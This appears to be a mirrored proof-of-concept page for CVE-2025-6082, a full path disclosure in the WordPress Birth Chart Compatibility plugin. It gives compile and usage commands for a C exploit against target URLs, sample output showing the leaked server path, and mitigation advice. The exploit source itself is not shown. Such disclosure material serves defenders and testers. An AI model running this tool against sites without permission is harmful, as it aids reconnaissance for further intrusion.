Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-6082 PoC — WordPress plugin Birth Chart Compatibility 信息泄露漏洞

Source
Associated Vulnerability
Title:WordPress plugin Birth Chart Compatibility 信息泄露漏洞 (CVE-2025-6082)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Birth Chart Compatibility 2.0及之前版本存在信息泄露漏洞,该漏洞源于直接访问index.php文件导致完整路径泄露,可能辅助其他攻击。
Description
Proof‑of‑Concept exploits the Full Path Disclosure bug in the  “Birth Chart Compatibility” WordPress plugin (<=v2.0)
Readme
# CVE-2025-6082 Full Path Disclosure PoC

**Author**: Byte Reaper  
**Telegram**: [@ByteReaper0](https://t.me/ByteReaper0)  
**CVE**: CVE-2025-6082  
**Vulnerability**: Full Path Disclosure (CWE-200)  

## Description
This Proof‑of‑Concept exploits a Full Path Disclosure bug in the **Birth Chart Compatibility** WordPress plugin (versions ≤ 2.0). The POC sends an HTTP GET request to the plugin’s `index.php` endpoint, captures any PHP warning or fatal error, and parses out the server’s filesystem path (e.g. `/var/www/html/wp-content/plugins/...` or `C:\xampp\htdocs\...`).  
Revealing the full path aids an attacker in chaining further Local File Inclusion (LFI), Remote Code Execution (RCE), or other reconnaissance attacks.

## Requirements
- Linux
- `gcc` or compatible C compiler
- `libcurl` development headers
- `argparse.c` / `argparse.h` 

## Compilation

```
gcc -o fpd-poc exploit.c argparse.c  -lcurl
```
## Usage
./fpd-poc -u https://target.com [options]

Options:
# Flag  Description

**-u, --url <URL>   (Required) Base URL of the target WordPress site**

**-c, --cookies <FILE> Use cookies from FILE (optional)**

**-v, --verbose  Enable verbose curl output**

**-f, --loop <N> Repeat the request N times (e.g. -f 10)**

**-h, --help  Show this help message**

Example: 

# Single check
./fpd-poc -u https://victim.com

# Verbose mode with 5 repeated checks
./fpd-poc -u https://victim.com -v -f 5
Sample output:

[+] Request sent successfully

[+] Input Url      : https://victim.com

[+] Full Format Url: https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php

[+] Http Code      : 200

====================================[Response]====================================

Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...

[+] Response Len   : 256

[+] Keyword found: Warning:

[+] Context: Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php

## Mitigation
Update the “Birth Chart Compatibility” plugin to a patched version (> 2.0) as soon as it is released.

Disable or remove the plugin if you do not use it.

Deny direct access to plugin PHP files (index.php) through your web server configuration (e.g. via .htaccess or Nginx rules).

Disclaimer
This code is provided for educational and testing purposes only. Unauthorized use against systems you do not own or have explicit permission to test may be illegal.

File Snapshot

[4.0K] /data/pocs/8fe40393ff6a60008e774d59469a13d44e959184 ├── [9.3K] exploit.c ├── [1.0K] LICENSE └── [2.5K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.